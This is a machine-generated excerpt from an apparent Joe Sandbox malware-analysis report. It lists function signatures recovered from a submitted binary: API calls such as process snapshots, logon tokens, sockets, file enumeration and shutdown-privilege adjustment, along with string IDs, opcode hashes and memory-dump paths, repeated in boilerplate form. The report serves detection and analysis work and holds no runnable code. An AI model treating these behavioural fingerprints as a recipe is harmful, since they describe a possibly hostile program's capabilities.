                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                            • Instruction ID: b397b53b92e11bed43909ee18285af46240ffce097a9ce184393798dfc0abf92
                                                                            • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                            • Instruction Fuzzy Hash: EF316E32608B8586D770AF12E880BAAB7A4FB84BD0F544136DE8D43B14DF7DD456CB10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                            • Instruction ID: 565d44f5352a8000a1bd85ebf20b34663bc574a64ee98d7639f7c3883c0df0b8
                                                                            • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                            • Instruction Fuzzy Hash: 81F0C025A14A01C2EB14FF76DC54429A761FF88FE5B445131CD1E86378CF3CD5A68310
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                            • String ID: *.*
                                                                            • API String ID: 1927845040-438819550
                                                                            • Opcode ID: 94797e606ec46fa28a18436180ec63c0a6e339a333463912d785a686920f47f8
                                                                            • Instruction ID: aed391a37ecbd9fbf7198dd91bb5f98de154625f2933bd219108a50c7ba0134f
                                                                            • Opcode Fuzzy Hash: 94797e606ec46fa28a18436180ec63c0a6e339a333463912d785a686920f47f8
                                                                            • Instruction Fuzzy Hash: 5F51D132608A82A5EB20EB35E8516ADBB70FB457D4F900132DE5D03795DF3CE96AC720
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-2187161917
                                                                            • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                            • Instruction ID: 655d2a55966b0f7c46bcb32e0dd19e85ce82377655b1a6387296ea3b9abcfaba
                                                                            • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                            • Instruction Fuzzy Hash: C0B2B672A0869186E7749F399444ABCBBA1FB447D8F904135DA4E5BBC4DF3CE8A38710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                            • Instruction ID: 9bf0a1cdb7d4a8604b696806e2fb90212b1b6b24c8afd89e7dd14bc8ca875549
                                                                            • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                            • Instruction Fuzzy Hash: AA51D321B0875285EB20FB369405A7DAF90BF89FE4F848131DE5D07796CE7CD11287A0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 3769357847-24824748
                                                                            • Opcode ID: 4c8fcdb31f72f3120188c1de4036b50eaf24b17eb573960d77c147c030cdfb14
                                                                            • Instruction ID: 4556d62ee6b538b8e858180f1240734ad7e23cfff4484d09f47c98b10d845aac
                                                                            • Opcode Fuzzy Hash: 4c8fcdb31f72f3120188c1de4036b50eaf24b17eb573960d77c147c030cdfb14
                                                                            • Instruction Fuzzy Hash: AAD14A76B08A16C5EB20EF7AC090AAD6BB0FB48BC8B844032DE4D57B55DF39D456C360
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _handle_error
                                                                            • String ID: !$VUUU$fmod
                                                                            • API String ID: 1757819995-2579133210
                                                                            • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                            • Instruction ID: 911480168b3d646a1b69d17aaabd8fa8565728f28a34b9d8c40ea2f351390b09
                                                                            • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                            • Instruction Fuzzy Hash: F2B1E421A2CFC544D6B39A3450113BAF759AFEA3D0F50C332EA5E36AA4DF2C95938740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 1286766494-0
                                                                            • Opcode ID: 09e4e907ae870b3820667c0232f28915d6dd8b336669930dd8abe80671f645cd
                                                                            • Instruction ID: 9723cdb83b02bde6816b12ca4659fc6e7bcc0908ac57af04ec175f4c1b8c13e9
                                                                            • Opcode Fuzzy Hash: 09e4e907ae870b3820667c0232f28915d6dd8b336669930dd8abe80671f645cd
                                                                            • Instruction Fuzzy Hash: D8A2A072A08A429AE734AF34D450979BBA1FB44BC8F948135DB4D07B98DF3DE5238724
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID: 0
                                                                            • API String ID: 33631002-4108050209
                                                                            • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                            • Instruction ID: 29d5c8f986d34c4fa4e03b0f0719d809f3776e918fdbee71adc31a5f34b7f06d
                                                                            • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                            • Instruction Fuzzy Hash: 42217436618780C6D3309F21E884A9ABBB4F7857D4F544226EB9D03B94DF3CD666CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 2163645468-3733053543
                                                                            • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                            • Instruction ID: 3de85299f5c757291b5c10e79704a374ae116efd31ba8807877e14e4ee4507bd
                                                                            • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                            • Instruction Fuzzy Hash: 40119432B1860282E738EB35D84197EEA51BF84790F854135E55DC3999EF3CD826C760
                                                                            APIs
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF797855C43
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 389471666-631824599
                                                                            • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                            • Instruction ID: 66f93680a8296d3e1ddf36f433728a3cc09ccb1cfa70e197615d81a42cd559f1
                                                                            • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                            • Instruction Fuzzy Hash: 39116A32A18B4296EB24AB32DA507B9B7A5FF44395FC04134C64D82A50EF3CE4B5C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                            • Instruction ID: 9efa83c42b61d38ec1fc435cedcdd6cc971406f1b1d0375314a956a857d007de
                                                                            • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                            • Instruction Fuzzy Hash: DEE06D21915B0281EF24AB30E805B2867E0FF08B88FC80434C91D41354EF7CD5AAC310
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2733932498-0
                                                                            • Opcode ID: 3fbeb57f627862e8b036b3c53b7652ac04d50a8be8efc141ccf8b94d9cd90ad5
                                                                            • Instruction ID: 02487b988be16f3c24e98d946e064f4ac3eb168781c16dc8d242be1ff32c7845
                                                                            • Opcode Fuzzy Hash: 3fbeb57f627862e8b036b3c53b7652ac04d50a8be8efc141ccf8b94d9cd90ad5
                                                                            • Instruction Fuzzy Hash: 16B16E66B04B5685EB20EF36D490ABDBB60FB48FD4F899036DE4D47796CE38D4528320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1083639309-0
                                                                            • Opcode ID: 926a5f41c70e85f903ad13907dcdbfaef4bd4711574ecbe01ebdb8b6e25b81d1
                                                                            • Instruction ID: f2aeb45d76cef389aebc1c0cf56e8d7f4471eb55dbf68e40f0895e9d8d978e03
                                                                            • Opcode Fuzzy Hash: 926a5f41c70e85f903ad13907dcdbfaef4bd4711574ecbe01ebdb8b6e25b81d1
                                                                            • Instruction Fuzzy Hash: 2C418132A18A8291E724FF75E4849AEEB64FB94BC4FD44032EA4D03655EF7CD526C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2695905019-0
                                                                            • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                            • Instruction ID: 60288e664510590da1b6d7cf09e765434db329255b735d06bb84a5257b38bc35
                                                                            • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                            • Instruction Fuzzy Hash: 84F05E60E0860281EA387B34B80CB38A660BF42BF5F944330D47E062E4DF6C94AA4220
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DEFINE$x
                                                                            • API String ID: 0-4035502692
                                                                            • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                            • Instruction ID: ed4d5c603c4db5bf24c14bf226e333ff564b61781a29de5cafae3cbebb75b0b2
                                                                            • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                            • Instruction Fuzzy Hash: 41539D72B146528AE770AF75C440ABDBBA0FB44BC8F908136DE4D57B84EB39E952C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID:
                                                                            • API String ID: 1385522511-0
                                                                            • Opcode ID: fde1bfadd192644d32b9eca16d35938936fa1ebc796e9fd11923c5e6be2b1dd5
                                                                            • Instruction ID: aab1963dfd30a778760f8f0e88c58fdf0146b73307498d8a5a3323eeb9691994
                                                                            • Opcode Fuzzy Hash: fde1bfadd192644d32b9eca16d35938936fa1ebc796e9fd11923c5e6be2b1dd5
                                                                            • Instruction Fuzzy Hash: E8828F32A08A528AEB70EF25E445A79BBA0FB54BD4FD14036DA4D47794DF7CE462C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s
                                                                            • String ID:
                                                                            • API String ID: 1502251526-0
                                                                            • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                            • Instruction ID: 59765e8838c3cf8019f284ae9de6c0b49caa3bc4b28e579eb244ad4f2b47bc68
                                                                            • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                            • Instruction Fuzzy Hash: 7CD1B532F1868697D774DF25E184A6EBAA1FB887C4F948134CB4E53B45DA3CE852CB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 48e57e618d05c1161541fb2cfdf83d6530d09c7224f4e65aa15c5650d3fdf655
                                                                            • Instruction ID: 68ad87a04897171c594df3c8aa3cbb15497e83ff9bdda33af3b2aca0b45db302
                                                                            • Opcode Fuzzy Hash: 48e57e618d05c1161541fb2cfdf83d6530d09c7224f4e65aa15c5650d3fdf655
                                                                            • Instruction Fuzzy Hash: 44514A72708A4685DB24EF26D4946ACBB60FB84BD4F904232DA5E437A5CF7CE562C720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                            • Instruction ID: 51013d4aa0876422ac6aef1e027ad66673e483750d9e9e9065ac881f15636a77
                                                                            • Opcode Fuzzy Hash: 9da028b5588618e8017c2d6f59159552d0d086b50025af474123ec90f68560d5
                                                                            • Instruction Fuzzy Hash: D7312F32608B8586EB20AF29E4806AEBB60FB84BD4F504131EB8D43765DF7DD557C710
                                                                            APIs
                                                                            Memory Dump Source
